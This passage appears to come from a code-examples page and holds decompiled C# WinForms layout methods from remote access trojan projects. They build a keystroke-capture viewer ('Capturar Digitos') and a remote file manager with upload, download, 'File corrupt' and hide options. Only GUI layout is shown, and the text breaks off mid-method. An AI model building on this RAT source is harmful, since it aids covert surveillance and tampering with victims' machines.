private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::Troianos_RAT.kl));
     this.ProgressBar1       = new global::System.Windows.Forms.ProgressBar();
     this.MenuStrip1         = new global::System.Windows.Forms.MenuStrip();
     this.ToolStripMenuItem1 = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripMenuItem2 = new global::System.Windows.Forms.ToolStripMenuItem();
     this.TFind                      = new global::System.Windows.Forms.ToolStripTextBox();
     this.T1                         = new global::System.Windows.Forms.RichTextBox();
     this.ContextMenuStrip1          = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.CopyToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SelectAllToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.MenuStrip1.SuspendLayout();
     this.ContextMenuStrip1.SuspendLayout();
     this.SuspendLayout();
     this.ProgressBar1.Dock = global::System.Windows.Forms.DockStyle.Bottom;
     global::System.Windows.Forms.Control progressBar = this.ProgressBar1;
     global::System.Drawing.Point         location    = new global::System.Drawing.Point(0, 322);
     progressBar.Location   = location;
     this.ProgressBar1.Name = "ProgressBar1";
     global::System.Windows.Forms.Control progressBar2 = this.ProgressBar1;
     global::System.Drawing.Size          size         = new global::System.Drawing.Size(641, 10);
     progressBar2.Size          = size;
     this.ProgressBar1.TabIndex = 0;
     this.MenuStrip1.BackColor  = global::System.Drawing.Color.Black;
     this.MenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripMenuItem1,
         this.ToolStripMenuItem2,
         this.TFind
     });
     global::System.Windows.Forms.Control menuStrip = this.MenuStrip1;
     location             = new global::System.Drawing.Point(0, 0);
     menuStrip.Location   = location;
     this.MenuStrip1.Name = "MenuStrip1";
     global::System.Windows.Forms.Control menuStrip2 = this.MenuStrip1;
     size                              = new global::System.Drawing.Size(641, 27);
     menuStrip2.Size                   = size;
     this.MenuStrip1.TabIndex          = 1;
     this.MenuStrip1.Text              = "MenuStrip1";
     this.ToolStripMenuItem1.BackColor = global::System.Drawing.Color.Black;
     this.ToolStripMenuItem1.ForeColor = global::System.Drawing.Color.White;
     this.ToolStripMenuItem1.Name      = "ToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem toolStripMenuItem = this.ToolStripMenuItem1;
     size = new global::System.Drawing.Size(65, 23);
     toolStripMenuItem.Size            = size;
     this.ToolStripMenuItem1.Text      = "Atualizar";
     this.ToolStripMenuItem2.ForeColor = global::System.Drawing.Color.White;
     this.ToolStripMenuItem2.Name      = "ToolStripMenuItem2";
     global::System.Windows.Forms.ToolStripItem toolStripMenuItem2 = this.ToolStripMenuItem2;
     size = new global::System.Drawing.Size(70, 23);
     toolStripMenuItem2.Size      = size;
     this.ToolStripMenuItem2.Text = "Encontrar";
     this.TFind.BackColor         = global::System.Drawing.Color.Black;
     this.TFind.BorderStyle       = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.TFind.ForeColor         = global::System.Drawing.Color.White;
     this.TFind.Name = "TFind";
     global::System.Windows.Forms.ToolStripControlHost tfind = this.TFind;
     size                     = new global::System.Drawing.Size(150, 23);
     tfind.Size               = size;
     this.TFind.Text          = "...";
     this.T1.BackColor        = global::System.Drawing.Color.Black;
     this.T1.BorderStyle      = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.T1.ContextMenuStrip = this.ContextMenuStrip1;
     this.T1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.T1.ForeColor        = global::System.Drawing.Color.White;
     global::System.Windows.Forms.Control t = this.T1;
     location     = new global::System.Drawing.Point(0, 27);
     t.Location   = location;
     this.T1.Name = "T1";
     global::System.Windows.Forms.Control t2 = this.T1;
     size             = new global::System.Drawing.Size(641, 295);
     t2.Size          = size;
     this.T1.TabIndex = 2;
     this.T1.Text     = "";
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.CopyToolStripMenuItem,
         this.SelectAllToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control contextMenuStrip = this.ContextMenuStrip1;
     size = new global::System.Drawing.Size(160, 70);
     contextMenuStrip.Size            = size;
     this.CopyToolStripMenuItem.Image = global::Troianos_RAT.My.Resources.Resources.Untitled;
     this.CopyToolStripMenuItem.Name  = "CopyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem copyToolStripMenuItem = this.CopyToolStripMenuItem;
     size = new global::System.Drawing.Size(159, 22);
     copyToolStripMenuItem.Size            = size;
     this.CopyToolStripMenuItem.Text       = "Copiar";
     this.SelectAllToolStripMenuItem.Image = global::Troianos_RAT.My.Resources.Resources.chk;
     this.SelectAllToolStripMenuItem.Name  = "SelectAllToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem selectAllToolStripMenuItem = this.SelectAllToolStripMenuItem;
     size = new global::System.Drawing.Size(159, 22);
     selectAllToolStripMenuItem.Size      = size;
     this.SelectAllToolStripMenuItem.Text = "Selecionar Tudo";
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     size            = new global::System.Drawing.Size(641, 332);
     this.ClientSize = size;
     this.Controls.Add(this.T1);
     this.Controls.Add(this.ProgressBar1);
     this.Controls.Add(this.MenuStrip1);
     this.FormBorderStyle = global::System.Windows.Forms.FormBorderStyle.Fixed3D;
     this.Icon            = (global::System.Drawing.Icon)componentResourceManager.GetObject("$this.Icon");
     this.MainMenuStrip   = this.MenuStrip1;
     this.Name            = "kl";
     this.StartPosition   = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "Capturar Digitos";
     this.MenuStrip1.ResumeLayout(false);
     this.MenuStrip1.PerformLayout();
     this.ContextMenuStrip1.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #2
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmFilemanager));
     this.StatusStrip1                   = new global::System.Windows.Forms.StatusStrip();
     this.SL                             = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.ContextMenuStrip1              = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem       = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ContextMenuStrip2              = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.UPToolStripMenuItem            = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RunToolStripMenuItem           = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RefreshToolStripMenuItem1      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator1            = new global::System.Windows.Forms.ToolStripSeparator();
     this.DeleteToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.RenameToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator4            = new global::System.Windows.Forms.ToolStripSeparator();
     this.RarToolStripMenuItem           = new global::System.Windows.Forms.ToolStripMenuItem();
     this.UnrarToolStripMenuItem         = new global::System.Windows.Forms.ToolStripMenuItem();
     this.UploadToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.DownloadToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CorruptToolStripMenuItem       = new global::System.Windows.Forms.ToolStripMenuItem();
     this.StripToolStripMenuItem         = new global::System.Windows.Forms.ToolStripSeparator();
     this.EditToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.HiddenToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ShowToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.HiddenToolStripMenuItem1       = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator3            = new global::System.Windows.Forms.ToolStripSeparator();
     this.CutToolStripMenuItem           = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.PastToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator2            = new global::System.Windows.Forms.ToolStripSeparator();
     this.NewFolderToolStripMenuItem     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.NewFolderToolStripMenuItem1    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.NewEmptyFileToolStripMenuItem1 = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator5            = new global::System.Windows.Forms.ToolStripSeparator();
     this.OpenFolderToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ColumnHeader5                  = new global::System.Windows.Forms.ColumnHeader();
     this.TextBox1                       = new global::System.Windows.Forms.TextBox();
     this.Timer1                         = new global::System.Windows.Forms.Timer(this.components);
     this.PictureBox2                    = new global::System.Windows.Forms.PictureBox();
     this.PictureBox1                    = new global::System.Windows.Forms.PictureBox();
     this.Panel1                         = new global::System.Windows.Forms.Panel();
     this.ToolStrip1                     = new global::System.Windows.Forms.ToolStrip();
     this.ToolStripButton2               = new global::System.Windows.Forms.ToolStripButton();
     this.ToolStripButton3               = new global::System.Windows.Forms.ToolStripButton();
     this.ToolStripButton4               = new global::System.Windows.Forms.ToolStripButton();
     this.ToolStripSeparator6            = new global::System.Windows.Forms.ToolStripSeparator();
     this.ToolStripButton1               = new global::System.Windows.Forms.ToolStripButton();
     this.SplitContainer1                = new global::System.Windows.Forms.SplitContainer();
     this.L1                             = new global::NINGALINET.LV();
     this.ColumnHeader6                  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader8                  = new global::System.Windows.Forms.ColumnHeader();
     this.MG                             = new global::System.Windows.Forms.ImageList(this.components);
     this.SplitContainer2                = new global::System.Windows.Forms.SplitContainer();
     this.L2                             = new global::NINGALINET.LV();
     this.ColumnHeader2                  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader3                  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4                  = new global::System.Windows.Forms.ColumnHeader();
     this.MG2                            = new global::System.Windows.Forms.ImageList(this.components);
     this.RichTextBox1                   = new global::System.Windows.Forms.RichTextBox();
     this.ContextMenuStrip3              = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.SaveToolStripMenuItem          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem             = new global::System.Windows.Forms.ToolStripSeparator();
     this.SellectAllToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ToolStripSeparator7            = new global::System.Windows.Forms.ToolStripSeparator();
     this.CutToolStripMenuItem1          = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyToolStripMenuItem1         = new global::System.Windows.Forms.ToolStripMenuItem();
     this.PasteToolStripMenuItem         = new global::System.Windows.Forms.ToolStripMenuItem();
     this.pr                             = new global::NINGALINET.CHProgressbar();
     this.StatusStrip1.SuspendLayout();
     this.ContextMenuStrip1.SuspendLayout();
     this.ContextMenuStrip2.SuspendLayout();
     ((global::System.ComponentModel.ISupportInitialize) this.PictureBox2).BeginInit();
     ((global::System.ComponentModel.ISupportInitialize) this.PictureBox1).BeginInit();
     this.Panel1.SuspendLayout();
     this.ToolStrip1.SuspendLayout();
     this.SplitContainer1.Panel1.SuspendLayout();
     this.SplitContainer1.Panel2.SuspendLayout();
     this.SplitContainer1.SuspendLayout();
     this.SplitContainer2.Panel1.SuspendLayout();
     this.SplitContainer2.Panel2.SuspendLayout();
     this.SplitContainer2.SuspendLayout();
     this.ContextMenuStrip3.SuspendLayout();
     this.SuspendLayout();
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Font      = new global::System.Drawing.Font("Calibri", 8.25f);
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_41D_0 = this.StatusStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 340);
     arg_41D_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_447_0 = this.StatusStrip1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(584, 22);
     arg_447_0.Size             = size;
     this.StatusStrip1.TabIndex = 0;
     this.StatusStrip1.Text     = "StatusStrip1";
     this.SL.Name = "SL";
     global::System.Windows.Forms.ToolStripItem arg_48A_0 = this.SL;
     size           = new global::System.Drawing.Size(13, 17);
     arg_48A_0.Size = size;
     this.SL.Text   = "..";
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_4E2_0 = this.ContextMenuStrip1;
     size           = new global::System.Drawing.Size(114, 26);
     arg_4E2_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_509_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(113, 22);
     arg_509_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.ContextMenuStrip2.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.UPToolStripMenuItem,
         this.RunToolStripMenuItem,
         this.RefreshToolStripMenuItem1,
         this.ToolStripSeparator1,
         this.DeleteToolStripMenuItem,
         this.RenameToolStripMenuItem,
         this.ToolStripSeparator4,
         this.RarToolStripMenuItem,
         this.UnrarToolStripMenuItem,
         this.UploadToolStripMenuItem,
         this.DownloadToolStripMenuItem,
         this.CorruptToolStripMenuItem,
         this.StripToolStripMenuItem,
         this.EditToolStripMenuItem,
         this.HiddenToolStripMenuItem,
         this.ToolStripSeparator3,
         this.CutToolStripMenuItem,
         this.CopyToolStripMenuItem,
         this.PastToolStripMenuItem,
         this.ToolStripSeparator2,
         this.NewFolderToolStripMenuItem,
         this.ToolStripSeparator5,
         this.OpenFolderToolStripMenuItem
     });
     this.ContextMenuStrip2.Name = "ContextMenuStrip2";
     global::System.Windows.Forms.Control arg_63C_0 = this.ContextMenuStrip2;
     size           = new global::System.Drawing.Size(152, 414);
     arg_63C_0.Size = size;
     this.UPToolStripMenuItem.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("UPToolStripMenuItem.Image");
     this.UPToolStripMenuItem.Name  = "UPToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_681_0 = this.UPToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_681_0.Size = size;
     this.UPToolStripMenuItem.Text    = "UP";
     this.UPToolStripMenuItem.Visible = false;
     this.RunToolStripMenuItem.Name   = "RunToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_6C7_0 = this.RunToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_6C7_0.Size = size;
     this.RunToolStripMenuItem.Text      = "Open";
     this.RefreshToolStripMenuItem1.Name = "RefreshToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_701_0 = this.RefreshToolStripMenuItem1;
     size           = new global::System.Drawing.Size(151, 22);
     arg_701_0.Size = size;
     this.RefreshToolStripMenuItem1.Text = "Refresh";
     this.ToolStripSeparator1.Name       = "ToolStripSeparator1";
     global::System.Windows.Forms.ToolStripItem arg_73A_0 = this.ToolStripSeparator1;
     size           = new global::System.Drawing.Size(148, 6);
     arg_73A_0.Size = size;
     this.DeleteToolStripMenuItem.Name = "DeleteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_764_0 = this.DeleteToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_764_0.Size = size;
     this.DeleteToolStripMenuItem.Text = "Delete";
     this.RenameToolStripMenuItem.Name = "RenameToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_79E_0 = this.RenameToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_79E_0.Size = size;
     this.RenameToolStripMenuItem.Text = "Rename";
     this.ToolStripSeparator4.Name     = "ToolStripSeparator4";
     global::System.Windows.Forms.ToolStripItem arg_7D7_0 = this.ToolStripSeparator4;
     size           = new global::System.Drawing.Size(148, 6);
     arg_7D7_0.Size = size;
     this.RarToolStripMenuItem.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("RarToolStripMenuItem.Image");
     this.RarToolStripMenuItem.Name  = "RarToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_81C_0 = this.RarToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_81C_0.Size = size;
     this.RarToolStripMenuItem.Text    = "Add to archive";
     this.UnrarToolStripMenuItem.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("UnrarToolStripMenuItem.Image");
     this.UnrarToolStripMenuItem.Name  = "UnrarToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_871_0 = this.UnrarToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_871_0.Size = size;
     this.UnrarToolStripMenuItem.Text  = "Exract Hare";
     this.UploadToolStripMenuItem.Name = "UploadToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_8AB_0 = this.UploadToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_8AB_0.Size = size;
     this.UploadToolStripMenuItem.Text   = "Upload";
     this.DownloadToolStripMenuItem.Name = "DownloadToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_8E5_0 = this.DownloadToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_8E5_0.Size = size;
     this.DownloadToolStripMenuItem.Text = "Download";
     this.CorruptToolStripMenuItem.Name  = "CorruptToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_91F_0 = this.CorruptToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_91F_0.Size = size;
     this.CorruptToolStripMenuItem.Text = "File corrupt";
     this.StripToolStripMenuItem.Name   = "StripToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_958_0 = this.StripToolStripMenuItem;
     size           = new global::System.Drawing.Size(148, 6);
     arg_958_0.Size = size;
     this.EditToolStripMenuItem.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("EditToolStripMenuItem.Image");
     this.EditToolStripMenuItem.Name  = "EditToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_99D_0 = this.EditToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_99D_0.Size = size;
     this.EditToolStripMenuItem.Text    = "Edit";
     this.EditToolStripMenuItem.Visible = false;
     this.HiddenToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ShowToolStripMenuItem,
         this.HiddenToolStripMenuItem1
     });
     this.HiddenToolStripMenuItem.Name = "HiddenToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_A0D_0 = this.HiddenToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_A0D_0.Size = size;
     this.HiddenToolStripMenuItem.Text = "Get Attribute";
     this.ShowToolStripMenuItem.Name   = "ShowToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_A44_0 = this.ShowToolStripMenuItem;
     size           = new global::System.Drawing.Size(114, 22);
     arg_A44_0.Size = size;
     this.ShowToolStripMenuItem.Text    = "Normal";
     this.HiddenToolStripMenuItem1.Name = "HiddenToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_A7B_0 = this.HiddenToolStripMenuItem1;
     size           = new global::System.Drawing.Size(114, 22);
     arg_A7B_0.Size = size;
     this.HiddenToolStripMenuItem1.Text = "Hidden";
     this.ToolStripSeparator3.Name      = "ToolStripSeparator3";
     global::System.Windows.Forms.ToolStripItem arg_AB4_0 = this.ToolStripSeparator3;
     size           = new global::System.Drawing.Size(148, 6);
     arg_AB4_0.Size = size;
     this.CutToolStripMenuItem.Name = "CutToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_ADE_0 = this.CutToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_ADE_0.Size = size;
     this.CutToolStripMenuItem.Text  = "Cut";
     this.CopyToolStripMenuItem.Name = "CopyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_B18_0 = this.CopyToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_B18_0.Size = size;
     this.CopyToolStripMenuItem.Text = "Copy";
     this.PastToolStripMenuItem.Name = "PastToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_B52_0 = this.PastToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_B52_0.Size = size;
     this.PastToolStripMenuItem.Text = "Paste";
     this.ToolStripSeparator2.Name   = "ToolStripSeparator2";
     global::System.Windows.Forms.ToolStripItem arg_B8B_0 = this.ToolStripSeparator2;
     size           = new global::System.Drawing.Size(148, 6);
     arg_B8B_0.Size = size;
     this.NewFolderToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.NewFolderToolStripMenuItem1,
         this.NewEmptyFileToolStripMenuItem1
     });
     this.NewFolderToolStripMenuItem.Name = "NewFolderToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_BDF_0 = this.NewFolderToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_BDF_0.Size = size;
     this.NewFolderToolStripMenuItem.Text   = "New";
     this.NewFolderToolStripMenuItem1.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("NewFolderToolStripMenuItem1.Image");
     this.NewFolderToolStripMenuItem1.Name  = "NewFolderToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_C34_0 = this.NewFolderToolStripMenuItem1;
     size           = new global::System.Drawing.Size(156, 22);
     arg_C34_0.Size = size;
     this.NewFolderToolStripMenuItem1.Text     = "New Folder";
     this.NewEmptyFileToolStripMenuItem1.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("NewEmptyFileToolStripMenuItem1.Image");
     this.NewEmptyFileToolStripMenuItem1.Name  = "NewEmptyFileToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_C89_0 = this.NewEmptyFileToolStripMenuItem1;
     size           = new global::System.Drawing.Size(156, 22);
     arg_C89_0.Size = size;
     this.NewEmptyFileToolStripMenuItem1.Text = "New Empty File";
     this.ToolStripSeparator5.Name            = "ToolStripSeparator5";
     global::System.Windows.Forms.ToolStripItem arg_CC2_0 = this.ToolStripSeparator5;
     size           = new global::System.Drawing.Size(148, 6);
     arg_CC2_0.Size = size;
     this.OpenFolderToolStripMenuItem.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("OpenFolderToolStripMenuItem.Image");
     this.OpenFolderToolStripMenuItem.Name  = "OpenFolderToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_D07_0 = this.OpenFolderToolStripMenuItem;
     size           = new global::System.Drawing.Size(151, 22);
     arg_D07_0.Size = size;
     this.OpenFolderToolStripMenuItem.Text = "Download(s)";
     this.ColumnHeader5.Text   = "Type";
     this.TextBox1.Anchor      = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
     this.TextBox1.BackColor   = global::System.Drawing.Color.FromArgb(40, 40, 40);
     this.TextBox1.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.TextBox1.Font        = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
     this.TextBox1.ForeColor   = global::System.Drawing.Color.WhiteSmoke;
     global::System.Windows.Forms.Control arg_D99_0 = this.TextBox1;
     location               = new global::System.Drawing.Point(29, 3);
     arg_D99_0.Location     = location;
     this.TextBox1.Name     = "TextBox1";
     this.TextBox1.ReadOnly = true;
     global::System.Windows.Forms.Control arg_DCF_0 = this.TextBox1;
     size                    = new global::System.Drawing.Size(526, 20);
     arg_DCF_0.Size          = size;
     this.TextBox1.TabIndex  = 5;
     this.Timer1.Interval    = 1000;
     this.PictureBox2.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
     this.PictureBox2.Cursor = global::System.Windows.Forms.Cursors.Hand;
     this.PictureBox2.Image  = (global::System.Drawing.Image)componentResourceManager.GetObject("PictureBox2.Image");
     global::System.Windows.Forms.Control arg_E3C_0 = this.PictureBox2;
     location              = new global::System.Drawing.Point(559, 3);
     arg_E3C_0.Location    = location;
     this.PictureBox2.Name = "PictureBox2";
     global::System.Windows.Forms.Control arg_E63_0 = this.PictureBox2;
     size                      = new global::System.Drawing.Size(20, 20);
     arg_E63_0.Size            = size;
     this.PictureBox2.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
     this.PictureBox2.TabIndex = 9;
     this.PictureBox2.TabStop  = false;
     this.PictureBox1.Cursor   = global::System.Windows.Forms.Cursors.Hand;
     this.PictureBox1.Image    = (global::System.Drawing.Image)componentResourceManager.GetObject("PictureBox1.Image");
     global::System.Windows.Forms.Control arg_EC8_0 = this.PictureBox1;
     location              = new global::System.Drawing.Point(3, 3);
     arg_EC8_0.Location    = location;
     this.PictureBox1.Name = "PictureBox1";
     global::System.Windows.Forms.Control arg_EEF_0 = this.PictureBox1;
     size                      = new global::System.Drawing.Size(20, 20);
     arg_EEF_0.Size            = size;
     this.PictureBox1.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
     this.PictureBox1.TabIndex = 8;
     this.PictureBox1.TabStop  = false;
     this.Panel1.BackColor     = global::System.Drawing.Color.Black;
     this.Panel1.BorderStyle   = global::System.Windows.Forms.BorderStyle.FixedSingle;
     this.Panel1.Controls.Add(this.ToolStrip1);
     this.Panel1.Controls.Add(this.PictureBox1);
     this.Panel1.Controls.Add(this.PictureBox2);
     this.Panel1.Controls.Add(this.TextBox1);
     this.Panel1.Dock = global::System.Windows.Forms.DockStyle.Top;
     global::System.Windows.Forms.Control arg_FA8_0 = this.Panel1;
     location           = new global::System.Drawing.Point(0, 0);
     arg_FA8_0.Location = location;
     this.Panel1.Name   = "Panel1";
     global::System.Windows.Forms.Control arg_FD2_0 = this.Panel1;
     size                      = new global::System.Drawing.Size(584, 53);
     arg_FD2_0.Size            = size;
     this.Panel1.TabIndex      = 10;
     this.ToolStrip1.BackColor = global::System.Drawing.Color.Black;
     this.ToolStrip1.Dock      = global::System.Windows.Forms.DockStyle.Bottom;
     this.ToolStrip1.GripStyle = global::System.Windows.Forms.ToolStripGripStyle.Hidden;
     this.ToolStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripButton2,
         this.ToolStripButton3,
         this.ToolStripButton4,
         this.ToolStripSeparator6,
         this.ToolStripButton1
     });
     this.ToolStrip1.LayoutStyle = global::System.Windows.Forms.ToolStripLayoutStyle.Flow;
     global::System.Windows.Forms.Control arg_106E_0 = this.ToolStrip1;
     location                    = new global::System.Drawing.Point(0, 28);
     arg_106E_0.Location         = location;
     this.ToolStrip1.Name        = "ToolStrip1";
     this.ToolStrip1.RenderMode  = global::System.Windows.Forms.ToolStripRenderMode.System;
     this.ToolStrip1.RightToLeft = global::System.Windows.Forms.RightToLeft.Yes;
     global::System.Windows.Forms.Control arg_10B0_0 = this.ToolStrip1;
     size                                        = new global::System.Drawing.Size(582, 23);
     arg_10B0_0.Size                             = size;
     this.ToolStrip1.TabIndex                    = 13;
     this.ToolStrip1.Text                        = "ToolStrip1";
     this.ToolStripButton2.Checked               = true;
     this.ToolStripButton2.CheckState            = global::System.Windows.Forms.CheckState.Checked;
     this.ToolStripButton2.DisplayStyle          = global::System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.ToolStripButton2.Image                 = (global::System.Drawing.Image)componentResourceManager.GetObject("ToolStripButton2.Image");
     this.ToolStripButton2.ImageTransparentColor = global::System.Drawing.Color.Magenta;
     this.ToolStripButton2.Name                  = "ToolStripButton2";
     global::System.Windows.Forms.ToolStripItem arg_1143_0 = this.ToolStripButton2;
     size                                        = new global::System.Drawing.Size(23, 20);
     arg_1143_0.Size                             = size;
     this.ToolStripButton2.Text                  = "View Details";
     this.ToolStripButton3.DisplayStyle          = global::System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.ToolStripButton3.Image                 = (global::System.Drawing.Image)componentResourceManager.GetObject("ToolStripButton3.Image");
     this.ToolStripButton3.ImageTransparentColor = global::System.Drawing.Color.Magenta;
     this.ToolStripButton3.Name                  = "ToolStripButton3";
     global::System.Windows.Forms.ToolStripItem arg_11B1_0 = this.ToolStripButton3;
     size                                        = new global::System.Drawing.Size(23, 20);
     arg_11B1_0.Size                             = size;
     this.ToolStripButton3.Text                  = "View List";
     this.ToolStripButton4.DisplayStyle          = global::System.Windows.Forms.ToolStripItemDisplayStyle.Image;
     this.ToolStripButton4.Image                 = (global::System.Drawing.Image)componentResourceManager.GetObject("ToolStripButton4.Image");
     this.ToolStripButton4.ImageTransparentColor = global::System.Drawing.Color.Magenta;
     this.ToolStripButton4.Name                  = "ToolStripButton4";
     global::System.Windows.Forms.ToolStripItem arg_121F_0 = this.ToolStripButton4;
     size                          = new global::System.Drawing.Size(23, 20);
